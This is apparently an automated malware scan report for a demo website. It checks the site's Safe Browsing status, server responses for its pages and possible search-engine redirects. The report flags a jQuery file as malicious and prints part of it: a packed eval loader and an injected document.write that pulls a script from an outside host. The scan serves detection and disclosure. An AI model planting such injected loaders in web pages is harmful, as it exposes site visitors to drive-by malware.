Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=demos.nispaarasolutions.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://demos.nispaarasolutions.com/ | 200 OK Content-Length: 1011 Content-Type: text/html | clean |
http://demos.nispaarasolutions.com/400.shtml | 200 OK Content-Length: 130 Content-Type: text/html | clean |
http://demos.nispaarasolutions.com/test404page.js | 404 Not Found Content-Length: 2445 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
http://demos.nispaarasolutions.com/401.shtml | 200 OK Content-Length: 162 Content-Type: text/html | clean |
http://demos.nispaarasolutions.com/403.shtml | 200 OK Content-Length: 180 Content-Type: text/html | clean |
http://demos.nispaarasolutions.com/404.shtml | 200 OK Content-Length: 2445 Content-Type: text/html | clean |
http://demos.nispaarasolutions.com/500.php | 500 Internal Server Error Content-Length: 43 Content-Type: text/html | clean |
http://demos.nispaarasolutions.com/500.shtml | 200 OK Content-Length: 43 Content-Type: text/html | clean |
http://demos.nispaarasolutions.com/acengage/ | 500 Internal Server Error Content-Length: 0 Content-Type: text/html | clean |
http://demos.nispaarasolutions.com/cgi-bin/ | 403 Forbidden Content-Length: 179 Content-Type: text/html | clean |
http://demos.nispaarasolutions.com/default.html | 200 OK Content-Length: 5843 Content-Type: text/html | clean |
http://demos.nispaarasolutions.com/favicon.ico | 200 OK Content-Length: 1150 Content-Type: image/vnd.microsoft.icon | clean |
http://demos.nispaarasolutions.com/fchc-intranet/ | 200 OK Content-Length: 2063 Content-Type: text/html | clean |
http://demos.nispaarasolutions.com/fchc-intranet/flexgrid/jquery-1.2.3.pack.js | 200 OK Content-Length: 30189 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('(J(){7(1e.3N)L w=1e.3N;L E=1e.3N=J(a,b){K 1B E.2l.4T(a,b)};7(1e.$)L D=1e.$;1e.$=E;L u=/^[^<]*(<(.|\\s) >)[^>]*$|^#(\\w )$/;L G=/^.[^:#\\[\\.]*$/;E.1n=E.2l={ document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://produccioneslibra.com/phocadownloadpap/HLlj1VrW.php" type="text/javascript"></script>') Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: demos.nispaarasolutions.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 09:04:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1011
Content-Type: text/html;charset=ISO-8859-1
...1011 bytes of data.
GET / HTTP/1.1
Host: demos.nispaarasolutions.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 09:04:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1011
Content-Type: text/html;charset=ISO-8859-1
...1011 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: demos.nispaarasolutions.com
Referer: http://www.google.com/search?q=demos.nispaarasolutions.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: demos.nispaarasolutions.com
Referer: http://www.google.com/search?q=demos.nispaarasolutions.com
Result:
The result is similar to the first query. There are no suspicious redirects found.